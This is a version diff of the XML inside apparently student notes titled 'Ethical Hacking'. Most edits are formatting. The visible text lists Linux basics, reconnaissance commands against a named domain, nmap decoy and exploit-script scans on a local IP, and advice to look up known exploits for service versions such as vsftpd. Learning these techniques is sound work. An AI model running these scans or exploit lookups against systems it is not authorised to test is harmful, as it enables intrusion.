--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -90,6 +90,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -100,7 +101,14 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">(open port 80, </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">open port 80, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -479,7 +487,15 @@
               <w:t xml:space="preserve">mv </w:t>
             </w:r>
             <w:r>
-              <w:t>– to move file{mv file3.py FOLDERNAME}</w:t>
+              <w:t xml:space="preserve">– to move </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>file{</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>mv file3.py FOLDERNAME}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -670,11 +686,19 @@
                 <w:highlight w:val="green"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Ping()</w:t>
+              <w:t>Ping(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1037,9 +1061,11 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:t>Redhawk(</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:t>software tools</w:t>
             </w:r>
@@ -1392,6 +1418,7 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -1399,7 +1426,11 @@
               <w:t>Nmap</w:t>
             </w:r>
             <w:r>
-              <w:t>(Checking PORTS)</w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>Checking PORTS)</w:t>
             </w:r>
             <w:r>
               <w:t>- Sometimes it takes hours to scan.</w:t>
@@ -1416,7 +1447,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">You have to put </w:t>
+              <w:t xml:space="preserve">You </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>have to</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> put </w:t>
             </w:r>
             <w:r>
               <w:t>this</w:t>
@@ -1866,6 +1905,7 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1878,51 +1918,60 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">(flood </w:t>
-            </w:r>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>– when scanning outside network</w:t>
+              <w:t xml:space="preserve">flood </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">RND:5 </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{ipaddress}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -sS</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
+              <w:t>– when scanning outside network</w:t>
+            </w:r>
+            <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">RND:5 </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{ipaddress}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -sS</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
               <w:lastRenderedPageBreak/>
               <w:t>Decoy</w:t>
             </w:r>
@@ -1931,20 +1980,28 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">(flood – when scanning </w:t>
-            </w:r>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>inside</w:t>
+              <w:t xml:space="preserve">flood – when scanning </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
+              <w:t>inside</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
               <w:t xml:space="preserve"> network)</w:t>
             </w:r>
           </w:p>
@@ -1981,8 +2038,14 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
               <w:t>Security Evasion</w:t>
             </w:r>
           </w:p>
@@ -2035,11 +2098,20 @@
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
               <w:t>Vulnera</w:t>
             </w:r>
             <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
               <w:t>bility Analysis</w:t>
             </w:r>
           </w:p>
@@ -2098,29 +2170,17 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script </w:t>
-            </w:r>
-            <w:r>
-              <w:t>banner</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script </w:t>
-            </w:r>
-            <w:r>
-              <w:t>exploit</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
+              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2165,6 +2225,250 @@
               <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
             </w:r>
           </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>You can google the version for e.g.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="5"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="5"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Find version (vsftpd 2.3.)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="5"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Google it if theres already existing exploitation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -2450,6 +2754,95 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="18262D52"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E1AAF4B0"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="24F21451"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="033ECDDE"/>
@@ -2561,7 +2954,96 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3509666A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9CD64556"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="527E7511"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3D007ACE"/>
@@ -2650,7 +3132,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66D8281C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="162256E8"/>
@@ -2740,13 +3222,19 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1830051639">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1548644043">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="92751156">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="390814802">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="92751156">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="5" w16cid:durableId="1514765802">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -236,9 +236,19 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo ifconfig</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ifconfig</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
         </w:tc>
@@ -259,8 +269,13 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>pwd – current directory</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – current directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -295,12 +310,14 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>M</w:t>
             </w:r>
             <w:r>
               <w:t>kdir</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – add folder</w:t>
             </w:r>
@@ -512,8 +529,21 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo su – ROOT USER</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -715,11 +745,19 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup erertech.com</w:t>
+              <w:t>Nglookup</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -730,6 +768,7 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -742,6 +781,7 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -764,6 +804,23 @@
               <w:t>Ipchecker.com</w:t>
             </w:r>
           </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="2"/>
+              </w:numPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> erertech.com -v</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -796,6 +853,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -808,6 +866,7 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -827,6 +886,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -837,7 +897,14 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">hatweb </w:t>
+              <w:t>hatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
